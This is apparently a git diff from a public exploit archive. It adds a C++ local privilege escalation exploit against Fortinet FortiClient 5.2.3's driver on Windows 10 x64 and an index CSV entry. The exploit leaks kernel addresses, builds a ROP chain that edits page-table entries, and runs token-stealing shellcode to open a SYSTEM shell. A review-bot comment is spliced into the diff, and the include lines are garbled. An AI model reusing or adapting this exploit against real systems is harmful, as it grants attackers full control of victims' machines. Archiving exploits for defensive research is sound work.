diff --git a/exploits/windows_x86-64/local/45149.cpp b/exploits/windows_x86-64/local/45149.cpp
new file mode 100644
index 000000000..c63eb229a
--- /dev/null
+++ b/exploits/windows_x86-64/local/45149.cpp
@@ -0,0 +1,225 @@
+#include "stdafx.h"
+#include
+#include
+#include
+#include
+
+#pragma comment (lib,"psapi")
+
+PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
+{
+ memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
+ memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
+ leak_buffer[0] = 0x000000001a000008;
+ leak_buffer[1] = 0x0000000000000003;
+ leak_buffer[4] = 0x000000001a000028;
+ leak_buffer[6] = addr - 0x70;
+
+ DWORD IoControlCode = 0x22608C;
+ LPVOID InputBuffer = (LPVOID)0x000000001a000000;
+ DWORD InputBufferLength = 0x20;
+ LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
+ DWORD OutputBufferLength = 0x110;
+ DWORD lpBytesReturned;
+
+ BOOL triggerIOCTL;
+ triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
+ if (!triggerIOCTL)
+ {
+ printf("[!] Error in the SYSCALL: %d\n", GetLastError());
+ }
+
+ ULONGLONG result = leak_buffer[0x202];
+ return result;
+}
+
+ULONGLONG leakNtBase(HANDLE driver)
+{
+ ULONGLONG teb = (ULONGLONG)NtCurrentTeb();
+ ULONGLONG thread = *(PULONGLONG)(teb + 0x78);
+ ULONGLONG threadInfo = leakQWORD(thread, driver);
+ ULONGLONG ntAddr = leakQWORD(threadInfo + 0x2a8, driver);
+ ULONGLONG baseAddr = 0;
+ ULONGLONG signature = 0x00905a4d;
+ ULONGLONG searchAddr = ntAddr & 0xFFFFFFFFFFFFF000;
+
+ while (TRUE)
+ {
+ ULONGLONG readData = leakQWORD(searchAddr, driver);
+ ULONGLONG tmp = readData & 0xFFFFFFFF;
+ /*
+ printf("%llx\n", readData);
+ printf("%llx\n", tmp);
+ */
+
+ if (tmp == signature)
+ {
+ baseAddr = searchAddr;
+ break;
+ }
+ searchAddr = searchAddr - 0x1000;
+ }
+ return baseAddr;
+}
+
+ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
+{
+ ULONGLONG PsLoadModuleListAddr = ntBase + 0x34c5a0;
+ ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
+ ULONGLONG addr = 0;
+ while (1)
+ {
+ ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
+ ULONGLONG name = leakQWORD(namePointer, driver);
+ if (name == 0x00740072006f0046)
+ {
+ name = leakQWORD(namePointer + 8, driver);
+ if (name == 0x0069006800530069)
+ {
+ addr = leakQWORD(searchAddr + 0x30, driver);
+ break;
+ }
+ }
+ searchAddr = leakQWORD(searchAddr, driver);
+ }
+ return addr;
+}
+
+ULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result)
+{
+ PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000f5ffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ if (fake_stack == NULL)
+ {
+ printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
+ return 1;
+ }
+
+ memset(fake_stack, 0x41, 0x12000);
+ PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;
+ DWORD index = 0;
+
+ //
+ ropStack[index] = ntBase + 0x1684ef; index++; // pop rax ; pop rcx ; ret
+ ropStack[index] = fortishield_callback; index++; // FortiShield Callback
+ ropStack[index] = 0x0000000000000000; index++; // NULL
+ ropStack[index] = ntBase + 0x937eb; index++; // mov qword [rax], rcx ; ret
+ //
+
+ //
+ ropStack[index] = ntBase + 0x88614; index++; // pop rax ; ret
+ ropStack[index] = pte_result; index++; // PTE VA
+ ropStack[index] = ntBase + 0x1a3cb2; index++; // pop rdx ; ret
+ ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT
+ ropStack[index] = ntBase + 0xe8a8b; index++; // mov byte [rax], dl ; add eax, 0x01740000 ; ret
+ ropStack[index] = ntBase + 0x11e000; index++; // wbinvd ; ret
+ //
+
+ //
+ ropStack[index] = 0x00000000f6000100; index++; // Shellcode address
+ ropStack[index] = fortishield_restore; index++; // FortiShield return location
+ //
+
+ char token_steal[] =
+ "\x48\x31\xc0\x65\x48\x8b\x80"
+ "\x88\x01\x00\x00\x48\x8b\x80"
+ "\xb8\x00\x00\x00\x49\x89\xc0"
+ "\x48\x8b\x80\xe8\x02\x00\x00"
+ "\x48\x2d\xe8\x02\x00\x00\x48"
+ "\x8b\x88\xe0\x02\x00\x00\x48"
+ "\x83\xf9\x04\x75\xe6\x4c\x8b"
+ "\x88\x58\x03\x00\x00\x4d\x89"
+ "\x88\x58\x03\x00\x00\x3E\x48"
+ "\x8B\x04\x24\x48\x89\xF4\x48"
+ "\x83\xEC\x20\xFF\xE0";
+
+ memcpy((fake_stack + 0x2020), token_steal, sizeof(token_steal));
+ return 0;
+}
+
+ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start)
+{
+ ULONGLONG result = address >> 9;
+ result = result | pte_start;
+ result = result & (pte_start + 0x0000007ffffffff8);
+ return result;
+}
+
+int trigger_callback()
+{
+ printf("[+] Creating dummy file\n");
+ system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
+ printf("[+] Calling MoveFileEx()\n");
+
+ BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
+ if (MFEresult == 0)
+ {
+ printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
+ return 1;
+ }
+ return 0;
+}
+
+int main()
+{
+ LoadLibraryA("user32.dll"); // Populate Win32ThreadInfo
+
+ HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+ if (mdare == INVALID_HANDLE_VALUE)
+ {
+ printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
+ return 1;
+ }
+
+ HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+ if (forti == INVALID_HANDLE_VALUE)
+ {
+ printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
+ return 1;
+ }
+
+ LPDWORD hThread_id = 0;
+ HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&trigger_callback, NULL, CREATE_SUSPENDED, hThread_id);
+ if (hThread == NULL)
+ {
+ printf("[!] Error while calling CreateThread: %d\n", GetLastError());
+ return 1;
+ }
+
+ BOOL hThread_priority = SetThreadPriority(hThread, THREAD_PRIORITY_HIGHEST);
+ if (hThread_priority == 0)
+ {
+ printf("[!] Error while calling SetThreadPriority: %d\n", GetLastError());
+ return 1;
+ }
+
+ ULONGLONG ntBase = leakNtBase(mdare);
+ ULONGLONG ntPivot = ntBase + 0x1ab3ec; // mov esp, 0xf6000000; retn;
+ ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x62aeb, mdare);
+ ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
+ ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
+ ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;
+ printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
+ printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);
+ printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);
+
+ ULONGLONG pte_result = get_pxe_address_64(0xf6000000, ntMiGetPteAddressOffset);
+ printf("[+] PTE virtual address for 0xf6000000: %I64x\n", pte_result);
+ allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, pte_result);
+
+ DWORD IoControlCode = 0x220028;
+ ULONGLONG InputBuffer = ntPivot;
+ DWORD InputBufferLength = 0x8;
+ ULONGLONG OutputBuffer = 0x0;
+ DWORD OutputBufferLength = 0x0;
+ DWORD lpBytesReturned;
+
+ //DebugBreak();
+
+ BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
+ ResumeThread(hThread);
+ WaitForSingleObject(hThread, INFINITE);
+ system("start cmd.exe");
+
+ return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 20e43a697..59227f12a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
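Review bot: The new file documents none of its environment preconditions: the kernel and driver offsets it hard-codes (`ntBase + 0x34c5a0` in leakFortiBase, the gadget offsets in allocate_fake_stack, `ntBase + 0x1ab3ec` and `fortishieldBase + 0xd150` / `+ 0x2f73` in main) are valid only for one specific build, and trigger_callback writes to a path under a fixed user profile (`C:\Users\n00b\AppData\LocalLow\...`). Nothing in the source ties these values to the target named in the accompanying files_exploits.csv entry, so a reader of the .cpp alone cannot tell which images the offsets were taken from or why the code fails on any other machine. A header comment such as `// Offsets below are specific to the Windows 10 x64 Creators build and FortiClient 5.2.3 named in files_exploits.csv; the LocalLow path is hard-coded for user n00b` would make the assumptions explicit. The same note applies to the `#include` lines at the top, whose header names were stripped in this rendering and cannot be recovered from the page.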
@@ -9852,6 +9852,7 @@ id,file,description,date,author,type,platform,port
 45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux,
 45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows,
 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
+45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139